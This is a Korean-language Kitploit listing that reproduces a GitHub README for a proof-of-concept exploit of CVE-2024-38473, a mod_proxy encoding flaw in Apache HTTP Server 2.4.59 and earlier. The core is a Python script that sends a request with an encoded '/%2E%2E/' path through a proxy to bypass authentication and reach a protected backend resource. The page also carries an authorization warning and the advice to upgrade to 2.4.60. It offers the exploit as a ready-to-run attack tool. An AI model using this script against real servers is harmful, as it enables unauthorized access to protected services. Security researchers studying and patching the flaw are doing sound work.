Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-38473 — Apache HTTP Server mod_proxy의 인코딩 취약점(CVE-2024-38473)을 시연하는 개념 증명 스크립트로, 조작된 요청 URL을 통해 백엔드 서비스에 대한 인증 우회를 가능하게 합니다. | Kitploit
도구/GitHubGitHub/abdurahmon3236/cve-2024-38473
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubabdurahmon3236/cve-2024-38473

CVE-2024-38473

Apache HTTP Server mod_proxy의 인코딩 취약점(CVE-2024-38473)을 시연하는 개념 증명 스크립트로, 조작된 요청 URL을 통해 백엔드 서비스에 대한 인증 우회를 가능하게 합니다.

저장소 보기
322년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Apache HTTP Server mod_proxy 인코딩 문제 PoC (Proof of Concept)

이 저장소는 Apache HTTP Server 2.4.59 및 이전 버전의 mod_proxy 모듈에서 발생하는 인코딩 문제를 시연하기 위한 PoC(Proof of Concept) 스크립트를 포함하고 있습니다. 이 취약점은 잘못된 인코딩이 포함된 요청 URL이 백엔드 서비스로 전송되도록 하여, 조작된 요청을 통해 인증을 우회할 가능성이 있습니다.

Table of Contents

  • 취약점 설명
  • 설정 및 사용법
  • 중요 고려사항
  • 완화 방법

취약점 설명

CVE-ID: (Pending)

개요: Apache HTTP Server 2.4.59 및 이전 버전의 mod_proxy 모듈에서 발생하는 인코딩 문제로 인해 잘못된 인코딩이 포함된 요청 URL이 백엔드 서비스로 전송될 수 있습니다. 이로 인해 조작된 요청을 통해 인증 메커니즘이 우회될 가능성이 있습니다. 사용자는 이 문제를 해결한 버전 2.4.60으로 업그레이드하는 것을 권장합니다.

영향을 받는 버전:

  • Apache HTTP Server 2.4.59 및 이전 버전

수정된 버전:

  • Apache HTTP Server 2.4.60

설정 및 사용법

사전 요구사항

  • Python 3.x
  • requests 라이브러리 (pip install requests)

취약점 시연

  1. 백엔드 서비스 식별:

    • 백엔드 서비스가 http://backend-service.example.com에 있다고 가정합니다.
  2. 악성 요청 제작:

    • 악성 요청은 인증을 우회하기 위해 잘못된 인코딩을 사용합니다.
  3. PoC 스크립트 실행:

    • 다음 스크립트를 mod_proxy_poc.py로 저장하고 실행합니다.

PoC 스크립트

다음은 취약점을 시연하는 Python 스크립트입니다:

root@kitploit:~
import requests

# Configuration
proxy_url = "http://proxy-server.example.com"  # Change this to the proxy server's URL
backend_service_path = "/protected/resource"  # The path to the protected resource on the backend service
malicious_path = "/%2E%2E/protected/resource"  # Incorrectly encoded path to bypass authentication

# Malicious request to be sent via the proxy server
malicious_url = f"{proxy_url}{malicious_path}"

def send_malicious_request():
    try:
        # Send the crafted request to the proxy server
        response = requests.get(malicious_url)
        
        # Print the response details
        print("Status Code:", response.status_code)
        print("Response Headers:", response.headers)
        print("Response Body:", response.text)
        
        if response.status_code == 200:
            print("[+] Successfully bypassed authentication and accessed the protected resource.")
        else:
            print("[-] Failed to bypass authentication.")
    except Exception as e:
        print("[-] An error occurred:", str(e))

if __name__ == "__main__":
    send_malicious_request()

설명

  1. 설정:

    • proxy_url: 프록시 서버의 URL
    • backend_service_path: 백엔드 서비스의 보호된 리소스 경로
    • malicious_path: 인증을 우회하기 위한 잘못 인코딩된 경로
  2. send_malicious_request:

    • 잘못 인코딩된 경로로 악성 URL을 구성합니다.
    • 악성 URL을 사용하여 프록시 서버에 GET 요청을 보냅니다.
    • 인증이 우회되었는지 확인하기 위해 응답 세부 정보를 출력합니다.

중요 고려사항

  • 권한: 대상 시스템에서 이 취약점을 테스트하기 위해 명시적 권한이 있는지 확인하십시오. 무단 접근은 불법이며 비윤리적입니다.
  • 테스트 환경: 프로덕션 시스템에 영향을 미치지 않도록 통제된 환경에서 테스트를 수행하십시오.

완화 방법

이 취약점을 완화하려면 mod_proxy 모듈의 인코딩 문제를 수정한 Apache HTTP Server 2.4.60 버전으로 업그레이드하십시오.

  • 업그레이드 지침:
    • 공식 Apache HTTP Server 문서를 따라 최신 버전을 다운로드하여 설치하십시오.

소프트웨어를 최신 상태로 유지하고 보안 모범 사례를 따르면 mod_proxy 모듈의 인코딩 문제와 같은 취약점을 예방할 수 있습니다.

도구 다운로드